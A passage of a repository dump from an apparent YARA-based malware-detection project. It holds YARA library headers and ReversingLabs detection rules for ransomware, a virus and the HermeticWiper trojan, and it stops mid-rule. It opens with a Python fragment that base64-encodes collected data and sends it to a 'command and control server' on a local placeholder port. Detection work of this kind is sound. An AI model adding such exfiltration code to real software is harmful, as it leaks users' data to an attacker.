data 61 | encoded_data = base64.b64encode(json.dumps(data).encode()) 62 | 63 | # send data to command and control server 64 | 65 | # create a socket object 66 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | 68 | # connect to command and control server on port 1337 69 | s.connect(("127.0.0.1", 1337)) 70 | s.send(encoded_data) 71 | s.close() 72 | 73 | 74 | if __name__ == "__main__": 75 | main() 76 | -------------------------------------------------------------------------------- /src/lib/include/yara/filemap.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_FILEMAP_H 31 | #define YR_FILEMAP_H 32 | 33 | #include 34 | 35 | #if defined(_WIN32) || defined(__CYGWIN__) 36 | #include 37 | #define YR_FILE_DESCRIPTOR HANDLE 38 | #else 39 | #define YR_FILE_DESCRIPTOR int 40 | #endif 41 | 42 | #include 43 | #include 44 | #include 45 | 46 | 47 | typedef struct _YR_MAPPED_FILE 48 | { 49 | YR_FILE_DESCRIPTOR file; 50 | size_t size; 51 | const uint8_t* data; 52 | #if defined(_WIN32) || defined(__CYGWIN__) 53 | HANDLE mapping; 54 | #endif 55 | 56 | } YR_MAPPED_FILE; 57 | 58 | 59 | YR_API int yr_filemap_map(const char* file_path, YR_MAPPED_FILE* pmapped_file); 60 | 61 | 62 | YR_API int yr_filemap_map_fd( 63 | YR_FILE_DESCRIPTOR file, 64 | uint64_t offset, 65 | size_t size, 66 | YR_MAPPED_FILE* pmapped_file); 67 | 68 | 69 | YR_API int yr_filemap_map_ex( 70 | const char* file_path, 71 | uint64_t offset, 72 | size_t size, 73 | YR_MAPPED_FILE* pmapped_file); 74 | 75 | 76 | YR_API void yr_filemap_unmap(YR_MAPPED_FILE* pmapped_file); 77 | 78 | 79 | YR_API void yr_filemap_unmap_fd(YR_MAPPED_FILE* pmapped_file); 80 | 81 | #endif 82 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Petya.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Ransomware_Petya : tc_detection malicious 4 | { 5 | 6 | meta: 7 | 8 | author = "ReversingLabs" 9 | 10 | source = "ReversingLabs" 11 | status = "RELEASED" 12 | sharing = "TLP:WHITE" 13 | category = "MALWARE" 14 | malware = "PETYA" 15 | description = "Yara rule that detects Petya ransomware." 16 | 17 | tc_detection_type = "Ransomware" 18 | tc_detection_name = "Petya" 19 | tc_detection_factor = 5 20 | 21 | strings: 22 | $entry_point = { 23 | 55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 24 | E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ?? 25 | ?? ?? ?? 8B C7 5F 5E 5D C2 26 | } 27 | 28 | $shutdown_pattern = { 29 | 55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 30 | 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D 31 | 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 32 | 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 33 | ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B 34 | E5 5D C3 35 | } 36 | 37 | $sectionxxxx_pattern = { 38 | 83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0 39 | 74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ?? 40 | ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B 41 | E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24 42 | ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72 43 | ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A 44 | 03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F 45 | 5E 5D 0F B6 C2 5B 83 C4 ?? C3 46 | } 47 | 48 | $crypt_gen_pattern = { 49 | 55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ?? 50 | ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ?? 51 | ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D 52 | C3 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and ($entry_point at pe.entry_point) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern 57 | 58 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Flamingo.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_Flamingo : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "FLAMINGO" 12 | description = "Yara rule that detects Flamingo ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Flamingo" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 22 | 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? 23 | ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 24 | ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 25 | C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 26 | 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 27 | 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 28 | C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 29 | 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 30 | } 31 | 32 | $encrypt_files = { 33 | 68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ?? 34 | ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? 35 | ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 36 | ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ?? 37 | ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 38 | C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 39 | C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? 40 | ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ?? 41 | ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? 42 | ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 43 | 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 44 | } 45 | 46 | condition: 47 | uint16(0) == 0x5A4D and 48 | ( 49 | $find_files 50 | ) and 51 | ( 52 | $encrypt_files 53 | ) 54 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Gpcode.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_GPCode : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GPCODE" 12 | description = "Yara rule that detects Gpcode ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "GPCode" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | $drive_loop = { 20 | B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80 21 | C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ?? 22 | ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D 23 | } 24 | 25 | $encrypt_routine = { 26 | FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10] 27 | E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ?? 28 | ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? 29 | ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ?? 30 | 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) 31 | ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ?? 32 | [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 33 | 75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8 34 | } 35 | 36 | $set_ransom_wallpaper = { 37 | 0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ?? 38 | B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F 39 | 59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33 40 | C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? 41 | ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 42 | 68 ?? ?? ?? ?? (E8 | FF 15) 43 | } 44 | 45 | $read_config_file = { 46 | 55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 47 | ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? 48 | ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ?? 49 | E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF 50 | 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 51 | 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 52 | 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 53 | 33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75 54 | ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 55 | 6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B 56 | 45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ?? 57 | ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 58 | } 59 | 60 | condition: 61 | uint16(0) == 0x5A4D and 62 | ($drive_loop and 63 | $encrypt_routine and 64 | $set_ransom_wallpaper and 65 | $read_config_file) 66 | 67 | } -------------------------------------------------------------------------------- /src/lib/include/yara/ahocorasick.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2013. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef _AHOCORASICK_H 31 | #define _AHOCORASICK_H 32 | 33 | #include 34 | #include 35 | #include 36 | 37 | // Number of bits dedicated to store the offset of the slot relative to its 38 | // own state. 39 | #define YR_AC_SLOT_OFFSET_BITS 9 40 | 41 | // Max number of slots in the transition table. This is the maximum number of 42 | // slots that can be addressed with 23-bit indexes. 43 | #define YR_AC_MAX_TRANSITION_TABLE_SIZE 0x800000 44 | 45 | #define YR_AC_ROOT_STATE 0 46 | #define YR_AC_NEXT_STATE(t) (t >> YR_AC_SLOT_OFFSET_BITS) 47 | #define YR_AC_INVALID_TRANSITION(t, c) (((t) &0x1FF) != c) 48 | 49 | #define YR_AC_MAKE_TRANSITION(state, code) \ 50 | ((YR_AC_TRANSITION)( \ 51 | (((YR_AC_TRANSITION) state) << YR_AC_SLOT_OFFSET_BITS) | (code))) 52 | 53 | int yr_ac_automaton_create(YR_ARENA* arena, YR_AC_AUTOMATON** automaton); 54 | 55 | int yr_ac_automaton_destroy(YR_AC_AUTOMATON* automaton); 56 | 57 | int yr_ac_add_string( 58 | YR_AC_AUTOMATON* automaton, 59 | YR_STRING* string, 60 | uint32_t string_idx, 61 | YR_ATOM_LIST_ITEM* atom, 62 | YR_ARENA* arena); 63 | 64 | int yr_ac_compile(YR_AC_AUTOMATON* automaton, YR_ARENA* arena); 65 | 66 | void yr_ac_print_automaton(YR_AC_AUTOMATON* automaton); 67 | 68 | #endif 69 | -------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Greenp.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Virus_Greenp : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "GREENP" 14 | description = "Yara rule that detects Greenp virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Greenp" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | $greenp_body_1 = { 22 | 68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01 23 | 50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC 24 | 6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00 25 | FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? 26 | ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF 27 | 95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46 28 | 0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4 29 | 68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ?? 30 | ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 31 | 8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43 32 | 10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42 33 | 50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ?? 34 | ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99 35 | } 36 | 37 | $greenp_body_2 = { 38 | 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95 39 | ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ?? 40 | ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ?? 41 | ?? ?? C3 42 | } 43 | 44 | condition: 45 | uint16(0) == 0x5A4D and ($greenp_body_1 at pe.entry_point) and $greenp_body_2 46 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Ghostbin : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GHOSTBIN" 12 | description = "Yara rule that detects Ghostbin ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Ghostbin" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 22 | 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 23 | 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08 24 | 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ?? 25 | ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? 26 | ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 27 | ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ?? 28 | ?? ?? DE ?? 2A 29 | } 30 | 31 | $encrypt_files = { 32 | 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ?? 33 | ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ?? 34 | ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08 35 | 09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A 36 | } 37 | 38 | $find_files = { 39 | 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28 40 | ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B 41 | 2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ?? 42 | ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 43 | 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? 44 | ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B 45 | 07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? 46 | 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 47 | DE ?? 2A 48 | } 49 | 50 | condition: 51 | uint16(0) == 0x5A4D and 52 | ( 53 | $setup_env 54 | ) and 55 | ( 56 | $find_files 57 | ) and 58 | ( 59 | $encrypt_files 60 | ) 61 | } -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.HermeticWiper.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_HermeticWiper : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "HERMETICWIPER" 12 | description = "Yara rule that detects HermeticWiper trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "HermeticWiper" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | $corrupt_physical_drive = { 20 | 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ?? 21 | ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F 22 | 11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ?? 23 | ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 24 | BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ?? 25 | 50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 26 | 75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ?? 27 | ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 28 | ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ?? 29 | ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ?? 30 | ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 31 | 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90 32 | 8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? 33 | ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 